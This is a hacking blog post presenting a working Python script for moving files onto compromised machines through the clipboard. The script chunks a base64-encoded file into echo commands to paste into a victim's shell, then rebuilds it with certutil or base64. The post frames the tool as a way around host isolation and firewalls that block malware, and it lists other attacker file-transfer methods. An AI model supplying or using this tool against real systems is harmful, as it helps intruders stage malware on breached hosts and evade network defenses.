Lifehacks for hackers: Clipboard File Transfer stable script

Researchers transfer files to compromised hosts with a couple of techniques as the host configuration may vary. I can briefly remember at least twenty real ways:

  • Attacker machine hosts a file on a server: HTTP, FTP, TFTP, SSH, SMB, and other protocols; pure socket on netcat, after all
  • Client downloads a file: wget, powershell, cscript, certutil, python, browser, RDP, pwnieforum, debug.exe method, and others
  • Client runs a server and waits for file upload: SMB, HTTP, netcat, python/perl/ruby/php, and others
  • Vulnerable situation based: meterpreter file transfers, compromised website file upload, and others

But, just logically, an attacker with a shell capable to do copy&paste operations must be able to transfer files. Even if the host is isolated, even if the firewall works and intercepts malware on the fly. The script below can be used for clipboard file transfers.

#!/usr/bin/python3

from base64 import b64encode
import argparse

if __name__=="__main__":
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('file', type=str, help="the file to send")
    arg_parser.add_argument('--bytecount', type=int, default=4096, help="how much bytes of base64 encoded data transfer on a single step")
    arg_parser.add_argument('--sleep', type=int, default=2, help="how much sleep between each step")
    arg_parser.add_argument('--outputFile', type=str, default='out.txt', help="the copy-paste file location")
    arg_parser.add_argument('--tempFile', type=str, default='temporary.txt', help="the name of temporary file on a target system")
    arg_parser.add_argument('--platform', choices=['windows', 'linux'], default='windows', type=str, help="target platform, default - windows")
    args = arg_parser.parse_args()
    
    data = str(b64encode(open(args.file, 'rb').read()))[2:-1]
    
    ret = ""
    if (args.platform=='windows'):
        ret += "del " + args.tempFile + "\n"
        for i in range(len(data)//args.bytecount+1):
            ret += "echo|set /P=" + str(data[i*args.bytecount:(i+1)*args.bytecount]) + ">> " + args.tempFile +  "\n"
            ret += "echo [" + str(i) + "/" + str(len(data)//args.bytecount) + "]\n"    
            if args.sleep:
                ret += "ping 127.0.0.1 -n " + str(args.sleep) + " > nul\n"
            ret += "cls\n"
        ret += "certutil -decode " + args.tempFile + " " + args.file + "\n"
    
    elif (args.platform=='linux'):
        ret += "rm " + args.tempFile + "\n"
        for i in range(len(data)//args.bytecount+1):
            ret += "echo -n " + str(data[i*args.bytecount:(i+1)*args.bytecount]) + ">> " + args.tempFile +  "\n"
            ret += "echo [" + str(i) + "/" + str(len(data)//args.bytecount) + "]\n"    
            if args.sleep:
                ret += "sleep " + str(args.sleep) + "\n"
            ret += "clear \n"
        ret += "base64 -d " + args.tempFile + " > " + args.file + "\n"
    
    else:
        print ("bad platform")
        exit(0)
       
    with open(args.outputFile,"w") as fout:
        fout.write(ret)
   

Pros:

  • Simple to make a single try
  • Usually works
  • Bypasses firewalls

Cons:

  • Slow
  • May require customization
  • May require debugging

Sample usage:

  1. Copy & Run the script
  2. Copy data from “out.txt” to clipboard
  3. Paste data to the victim’s shell